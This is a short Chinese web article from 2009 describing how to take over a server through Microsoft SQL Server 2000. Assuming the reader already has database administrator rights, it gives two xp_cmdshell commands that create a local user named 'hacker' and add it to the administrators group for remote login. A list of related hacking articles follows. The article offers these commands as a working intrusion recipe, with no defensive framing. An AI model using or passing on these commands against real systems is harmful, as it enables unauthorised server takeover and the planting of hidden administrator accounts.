通過MSSQL 2000 入侵服務(wù)器主機(jī)器的命令

發(fā)布時間：2009-04-13 10:38:54 作者：佚名

首先確保得到數(shù)據(jù)庫超級管理員權(quán)限然后執(zhí)行如下SQL命令: 1、exec master.dbo.xp_cmdshell 'net user hacker hacker /add' 2、exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add' 解釋： 1.通過調(diào)用cmdshell 也就是cmd 執(zhí)行DOS 命令創(chuàng)建ha

首先確保得到數(shù)據(jù)庫超級管理員權(quán)限

然后執(zhí)行如下SQL命令:

1、exec master.dbo.xp_cmdshell 'net user hacker hacker /add'
2、exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add'

解釋：

1.通過調(diào)用cmdshell 也就是cmd 執(zhí)行DOS 命令創(chuàng)建hacker用戶

2 授權(quán)給hacker用戶超級管理員權(quán)限..

3 這時候您就可以使用創(chuàng)建的帳戶去遠(yuǎn)程登陸這臺主機(jī)了

Tag：mssql 入侵服務(wù)器

相關(guān)文章

什么是CC攻擊判斷網(wǎng)站是否被CC攻擊并且如何防御CC攻擊
CC主要是用來攻擊頁面的,大家都有這樣的經(jīng)歷，就是在訪問論壇時，如果這個論壇比較大，訪問的人比較多，打開頁面的速度會比較慢，對不?!一般來說，訪問的人越多，論壇的頁
2024-01-06
Windows系統(tǒng)安全風(fēng)險-本地NTLM重放提權(quán)
入侵者主要通過Potato程序攻擊擁有SYSTEM權(quán)限的端口偽造網(wǎng)絡(luò)身份認(rèn)證過程，利用NTLM重放機(jī)制騙取SYSTEM身份令牌，最終取得系統(tǒng)權(quán)限，該安全風(fēng)險微軟并不認(rèn)為存在漏洞，所以
2021-04-15
文件上傳漏洞全面滲透分析小結(jié)
這篇文章主要介紹了文件上傳漏洞全面滲透分析小結(jié),這里主要為大家分享一下防御方法，需要的朋友可以參考下
2021-03-21
sql手工注入語句&SQL手工注入大全
這篇文章主要介紹了sql手工注入語句&SQL手工注入大全,需要的朋友可以參考下
2017-09-06
詳解Filezilla server 提權(quán)
這篇文章主要介紹了詳解Filezilla server 提權(quán),需要的朋友可以參考下
2017-05-13
FileZilla Server 2008 x64 提權(quán)與防御方法
這篇文章主要介紹了FileZilla Server 2008 x64 提權(quán)與防御方法,需要的朋友可以參考下
2017-05-13
https加密也被破解 HEIST攻擊從加密數(shù)據(jù)獲取明文
不久之前我們說過關(guān)于http和https的區(qū)別，對于加密的https，我們一直認(rèn)為它是相對安全的，可今天要講的是，一種繞過HTTPS加密得到明文信息的web攻擊方式，不知道這消息對你
2016-08-10
iPhone和Mac也會被黑一條iMessage密碼可能就被盜了
一直以來蘋果系統(tǒng)的安全性都是比安卓要高的，但是再安全的系統(tǒng)也免不了漏洞，蘋果也一樣。最近爆出的新漏洞，只需要接收一條多媒體信息或者iMessage就會導(dǎo)致用戶信息泄露。
2016-07-27
黑客都很厲害嗎厲害的只是一小部分
國家正在修正關(guān)于黑客方面的法律法規(guī)，有一條震驚黑客圈的“世紀(jì)佳緣”起訴白帽黑客事件，深深的傷害了廣大黑客們的心，加上扎克伯格和特拉維斯·卡蘭尼克賬號被盜，于是黑
2016-07-11
如何逆向破解HawkEye keylogger鍵盤記錄器進(jìn)入攻擊者郵箱
面對惡意郵件攻擊，我們就只能默默忍受被他攻擊，連自我保護(hù)能力都沒有談什么反抗？讓人痛快的是，如今有了解決辦法，逆向破解鍵盤記錄器，進(jìn)入攻擊者郵箱
2016-07-06